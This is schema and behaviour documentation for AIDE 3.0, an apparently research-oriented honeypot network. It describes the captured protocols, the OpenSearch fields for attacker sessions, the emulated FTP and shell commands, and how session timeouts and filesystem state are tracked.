Taxonomy
Overview
AIDE 3.0 is a real-time attack traffic collection system utilizing ProxyPot honeypots. The system ingests data into OpenSearch for advanced analytics. With 197 distributed sensors across 25 countries, it captures attacker-sensor interactions across multiple protocols (in both IPv4 and IPv6):
- FTP
- HTTP
- HTTPS
- SSH
- SFTP
- Telnet
Data Schema
Core Fields
| Field | Description |
|---|---|
_id | Unique document identifier |
_index | Document index name |
@timestamp | Event recording time (ISO8601 UTC) |
session | Unique session identifier |
sessionLength | Session duration (endTime - startTime) |
startTime | Session start timestamp |
endTime | Session end timestamp |
protocol | Communication protocol used |
sessionTimeout | Whether the session timed out |
Client (Intruder) Information
| Field | Description |
|---|---|
clientVersion | Client software version |
clientIP | Intruder IP address |
clientPort | Intruder source port |
Client Geolocation (clientGeo)
| Field | Description |
|---|---|
as_org | Organization associated with IP |
asn | Autonomous System Number |
city_name | City location |
country_name | Country name |
country_code2 | Two-letter country code |
country_code3 | Three-letter country code |
dma_code | Designated Market Area code |
ip | IP address |
latitude | Location latitude |
longitude | Location longitude |
timezone | IP timezone |
Host (Sensor) Information
| Field | Description |
|---|---|
hostIP | Sensor IP address |
hostPort | Sensor destination port |
hostName | ProxyPot device/emulation name |
Host Geolocation (hostGeo)
Contains identical fields to clientGeo, but for the sensor location.
Authentication Data
| Field | Description |
|---|---|
credentials | Failed login attempts (usernames/passwords) |
loggedIn | Successful login credentials |
allUserNames | All attempted usernames |
allUserPasswords | All attempted passwords |
Intrusion Details
| Field | Description |
|---|---|
category | Session classification (Scan/Attempt/Intrusion) |
allCommands | All executed commands |
commands | Fully emulated Unix commands |
unknownCommands | Non-emulated command attempts |
urls | Accessed URLs |
hashes | Downloaded malware file hashes |
virustotal | VirusTotal analysis results |
virustotalDominantResults | Representative VirusTotal detections |
URL Parsing (urlsParsed)
| Field | Description |
|---|---|
original | Complete URL |
hostname | URL hostname |
path | URL path |
port | URL port |
HTTP/HTTPS Data
| Field | Description |
|---|---|
httpRequests.body | Request body |
httpRequests.cookies | Request cookies |
httpRequests.headers | Request headers |
httpRequests.method | HTTP method |
httpRequests.status | Response status code |
httpRequests.uris | Requested URIs |
Supported Emulations
FTP
Full Command Support
ADAT, ALLO, APPE, AUTH, CDUP, CWD, CCC, CONF, CLNT, DELE, ENC, EPRT, EPSV, FEAT, LIST, LPRT, NLST, MDTM, MIC, MLSD, MKD,
MODE, NOOP, OPTS, PASS, PBSZ, PORT, PROT, PWD, QUIT, RETR, REST, RNFR, RNTO, RMD, SIZE, STAT, STOR, STRU, SYST, TYPE,
USER, XCUP, XCWD, XMKD, XPWD, XRMD
HTTP/HTTPS
- Apache Debian 2.4.62 (Basic HTTP server)
- WordPress 6.2.2 (Frontend)
SSH/Telnet (Debian 12)
Full Command Support
cd, chmod, chown, cp, curl, df, echo, export, hexdump, id, iptables, ip6tables, ls, lsblk, mkdir, mv, netplan, pwd, rm,
sleep, tail, touch, uname, unset, wc, wget, whoami
Partial Command Support
apt, apt-get, busybox, chattr, crontab
A Note on Session, Timeout and State
This brief description explains session, timeout behavior, and how state connects to sessions. It’s designed for users studying interactions like intrusion/attempts (unwanted traffic). It supports better tracking of multiple sessions and consistent states, while also giving the intruders more realistic system behavior.
Session
session : a unique identifier (ex. "1704947a-ca84-4df9-a560-f3bf4cc31d47") grouping activity from an attacker across connections. It starts with the first connection and persists until every connection closes or a timeout occurs. For non persistent protocols (ex. HTTP or FTP), connections from the same attacker IP are tracked under one session ID. For SSH and Telnet, each real connection gets its own session ID, even from the same attacker IP. All activity is fully monitored and tracked until termination.
Timeout
sessionTimeout : a boolean (ex. false) indicating whether the session ended due to a timeout (true) or completed naturally (false). The timeout is set at 60 seconds from the initial connection (startTime). If this limit is exceeded, connections are terminated, marking sessionTimeout as true. If connections end within 60 seconds, it remains false.
State and Session Relationship
state : a unique identifier (ex. "13c4b378-1f26-4f57-bb32-eb67a21769fb") tied to the filesystem during the session. State is preserved for 3 hours. If the same attacker (ex. IP "127.0.0.1" and protocol "ssh") reconnects within this period, they encounter the system as left previously, sharing the same state across all their connections. This keeps the system consistent for multiple connections within a session for non persistent protocols. For SSH and Telnet, it ties separate sessions with unique IDs to the same state over 3 hours, based on the attackers IP and protocol.